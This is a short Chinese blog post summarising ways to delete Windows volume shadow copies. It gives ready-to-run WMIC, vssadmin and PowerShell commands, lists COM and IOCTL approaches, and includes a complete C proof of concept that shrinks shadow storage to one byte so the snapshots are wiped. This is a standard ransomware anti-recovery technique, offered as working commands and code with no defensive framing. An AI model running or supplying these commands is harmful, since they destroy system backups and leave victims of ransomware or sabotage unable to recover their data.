卷影删除小结

一、几种系统方式卷影删除

1.1 WMIC

cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete

1.2 VSSADMIN

vssadmin Delete Shadow /all

1.3 Powershell

Get-WmiObject Win32_ShadowCopy| % {$_.Delete()}
Get-WmiObject Win32_ShadowCopy | Remove-WmiObject

1.4 调整大小为0

vssadmin resize shadowstorage /for=<backed volume>/on=<backup location volume> /maxsize=<new size>

 

二、代码实现

2.1 COM对象删除卷影

IVssBackupComponents::DeleteSnapshots

2.2 COM对象修改大小为0

IVssDifferentialSoftwareSnapshotMgmt::ChangeDiffAreaMaximumSize

2.3 DeviceIoControl删除卷影

发送IOCTL_VOLSNAP_DELETE_SNAPSHOT删除卷影

2.4 DeviceIoControl修改大小为0

发送IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE调整卷影大小
#include <Windows.h>
#include <tchar.h>


typedef struct _DIFF_AREA_SIZES
{
    LONGLONG UsedSpace; //value used for querying only
    LONGLONG AllocatedSpace; //value used for querying only
    LONGLONG MaximumSpace; //0 means UNBOUNDED
} DIFF_AREA_SIZES, *PDIFF_AREA_SIZES;

#define IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE 0x53c028 //type=0x53, function=0xc, method=METHOD_BUFFERED, Access=(FILE_READ_ACCESS | FILE_WRITE_ACCESS)

DWORD dwBRet;
DIFF_AREA_SIZES diffAreaSize;
TCHAR* tszVolumePath = _T("\\\\.\\C:"); //hardcoded, but perfectly enough for a PoC
HANDLE hVolume;

int _tmain(int argc, _TCHAR** argv)
{
    diffAreaSize.UsedSpace = 0; //unused anyway
    diffAreaSize.AllocatedSpace = 0; //unused anyway
    diffAreaSize.MaximumSpace = 1; //set to 1 byte of snapshot storage

    _tprintf(_T("Calling CreateFile()...\r\n"));

    hVolume = CreateFile(
        tszVolumePath,
        FILE_GENERIC_READ | FILE_GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    _tprintf(TEXT("CreateFile() returned %i\r\n"), GetLastError());
    if (INVALID_HANDLE_VALUE == hVolume)
    {
        return GetLastError();
    }

    _tprintf(_T("Calling DeviceIoControl()...\r\n"));

    DeviceIoControl(
        hVolume,
        IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE,
        &diffAreaSize,
        sizeof(diffAreaSize),
        NULL,
        0,
        &dwBRet,
        NULL
    );
    _tprintf(_T("DeviceIoControl() returned %i\r\n"), GetLastError());
    CloseHandle(hVolume);
    return GetLastError();
}
View Code

 

三、参考

https://github.com/gtworek/PSBits/blob/942b0e2293f6fcd4d5938ae387a3ee9e81ea94e8/IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE/IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE.c

https://www.freebuf.com/articles/system/239560.html

posted on 2022-11-17 23:46  ciyze0101  阅读(203)  评论(0编辑  收藏  举报

导航